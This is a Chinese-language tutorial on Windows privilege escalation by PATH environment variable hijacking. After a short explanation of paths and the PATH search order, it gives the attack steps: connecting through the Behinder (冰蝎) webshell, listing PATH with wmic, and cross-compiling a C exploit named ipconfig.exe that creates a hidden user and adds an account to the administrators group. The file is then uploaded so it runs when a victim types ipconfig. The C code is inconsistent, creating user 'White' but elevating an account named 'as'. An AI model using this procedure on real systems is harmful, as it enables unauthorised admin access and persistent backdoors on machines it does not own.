目录
前瞻
在学习提权之前,我们先了解什么是路径?
路径有两种类型:绝对路径和相对路径。绝对路径始终包含根元素和用于查找特定文件或文件夹的完整目录列表。查找文件或文件夹所需的所有信息都在绝对路径中可用。这与相对路径不同,相对路径通常与其他路径组合以访问文件。
绝对路径是指从根元素开始到以其他子目录结束的查找文件或文件夹所需的完整详细信息。在网站和操作系统中使用绝对路径来定位文件和文件夹。绝对路径也称为绝对路径名或完整路径。
一.原理
PATH环境变量包含了很多目录列表,某些执行程序的方法(使用cmd.exe或命令行)仅依赖于PATH环境变量来确定未提供程序路径时搜索程序的位置。简单说就是当用户在cmd命令行中运行一个命令时,若是没有使用绝对路径运行,如c:\windows\system32\ipconfig.exe,直接在cmd中运行ipconfig,那么windows会先在当前目录寻找ipconfig.exe,若是没有找到,会根据PATH环境变量里的目录依次进行寻找。
通常新增PATH环境变量是在末尾处添加,若是由于配置不当,导致在最前面新增环境变量,那么此目录下新建与常用系统命令一样名字的exe程序会优先执行。
总结:系统没有使用绝对路径去运行程序,导致可以运行具有相同名字的恶意程序,实现提权利用。
二.利用思路
1.连接后门,信息收集
(1)使用冰蝎等后门连接工具连接上我们的马后,在【命令执行】模块,执行命令
wmic ENVIRONMENT where “name=’PATH’” get Username,VariableValue //查看目标主机PATH环境变量配置情况。
2.提权
(1)执行exp,生成恶意文件
使用在Kali根目录下编写好的exp文件,并执行命令
i686-w64-mingw32-gcc exp.c -o ipconfig.exe(所需运行程序) -mwindows
编写C程序实现新建隐藏用户White,并将该用户添加到管理员组中。命令执行成功后会生成ipconfig.exe程序
添加用户EXP:
#include<stdlib.h>
int main()
{
int i ;
int j;
i=system("net user White test@123. /add"); //添加test用户
j=system("net localgroup administrators as /add"); //将新添加的用户加入超级管理员组
return 0;
}
(2)恶意文件上传目标机
Kali根目录下找到生成的ipconfig.exe程序,并将其下载到桌面或其他位置,利用冰蝎【文件管理】模块,将kali生成的exe程序上传至目标主机没有使用路径的环境变量处
(3)恶意文件执行
上传成功后,当用户打开cmd命令窗口执行ipconfig命令时,就会出现一个一闪而过的命令终端,从而执行我们的恶意文件,达到添加用户,并将其加入管理组,从而实现提权,方便后续渗透等操作。
三.总结
首先命令查看系统中首要运行的环境变量,再利用kali将根目录写好的恶意文件生成恶意程序.exe,再利用冰蝎将exe文件上传到目标主机下的首要运行的环境变量的目录下,从而实现提权